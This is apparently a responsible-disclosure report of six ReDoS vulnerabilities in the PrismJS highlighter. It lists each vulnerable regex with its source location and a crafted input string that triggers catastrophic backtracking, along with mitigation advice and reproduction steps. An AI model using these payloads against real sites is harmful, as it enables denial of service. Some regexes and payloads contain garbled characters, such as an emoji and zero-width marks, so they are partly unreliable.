ReDos in prism

Hi,

I would like to report 6 ReDoS vulnerabilities in prism (https://github.com/PrismJS/prism​).

It allows cause a denial of service if highlighting crafted codes.

• The first ReDos The vulnerable regular expression is "(?:%\s*\n\s*%|%.|[^%"\r\n])*" and is located in

https://github.com/PrismJS/prism/blob/38f42dd668a7bf388dfe0f5ed4b07aacb23b0255/components/prism-eiffel.js#L16

The ReDOS vulnerability can be exploited with the following crafted code string

function aa(){
"%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%%

%!
}

• The second ReDos The vulnerable regular expression is (\s*)(?:\+[=-]+)+\+(?:\r?\n|\r)(?:\1(?:[+|].+)+[+|](?:\r?\n|\r))+\1(?:\+[=-]+)+\+ and is located in https://github.com/PrismJS/prism/blob/38f42dd668a7bf388dfe0f5ed4b07aacb23b0255/components/prism-rest.js#L4​

The ReDOS vulnerability can be exploited with the following crafted code string​

+=+\r++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++!

• The third ReDos The vulnerable regular expression is (\s*)(?:=+ +)+=+(?:(?:\r?\n|\r)\1.+)+(?:\r?\n|\r)\1(?:=+ +)+=+(?=(?:\r?\n|\r){2}|\s*$) and is located in https://github.com/PrismJS/prism/blob/38f42dd668a7bf388dfe0f5ed4b07aacb23b0255/components/prism-rest.js#L11​

The ReDOS vulnerability can be exploited with the following crafted code string​

= = ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​= ​

• The fourth ReDos The vulnerable regular expression is (^[ \t]*)\[(?!\[)(?:(["'$])(?😦?!\2)[^\]|\.)\2|[(?:[^]\]|\.)]|[^]\]|\.)*]` and is located in https://github.com/PrismJS/prism/blob/38f42dd668a7bf388dfe0f5ed4b07aacb23b0255/components/prism-asciidoc.js#L4

The ReDOS vulnerability can be exploited with the following crafted code string​

[1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1!

• The fifth ReDos The vulnerable regular expression is (^[^\S\r\n]*)---(?:\r\n?|\n)(?:.*(?:\r\n?|\n))*?[^\S\r\n]*\.\.\.$ and is located in https://github.com/PrismJS/prism/blob/38f42dd668a7bf388dfe0f5ed4b07aacb23b0255/components/prism-tap.js#L15

The ReDOS vulnerability can be exploited with the following crafted code string​

---​\n\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r

• The sixth ReDos The vulnerable regular expression is ((?:^|[&(])[ \t]*)if(?: ?\/[a-z?](?:[ :](?:"[^"]*"|\S+))?)* (?:not )?(?:cmdextversion \d+|defined \w+|errorlevel \d+|exist \S+|(?:"[^"]*"|\S+)?(?:==| (?:equ|neq|lss|leq|gtr|geq) )(?:"[^"]*"|\S+)) and is located in https://github.com/PrismJS/prism/blob/38f42dd668a7bf388dfe0f5ed4b07aacb23b0255/components/prism-batch.js#L41

The ReDOS vulnerability can be exploited with the following crafted code string​

'if'+'/? '*100+'!'

I think you can limit the input length or modify this regex.

Steps To Reproduce:

1. First download the zip file from the link below https://drive.google.com/file/d/10RJ21Xr7NRKFBjtA7IoqaRuUVO3v050V/view?usp=sharing
2. Open the test.html in the root directory
3. Input the above crafted code strings and select the corresponding languages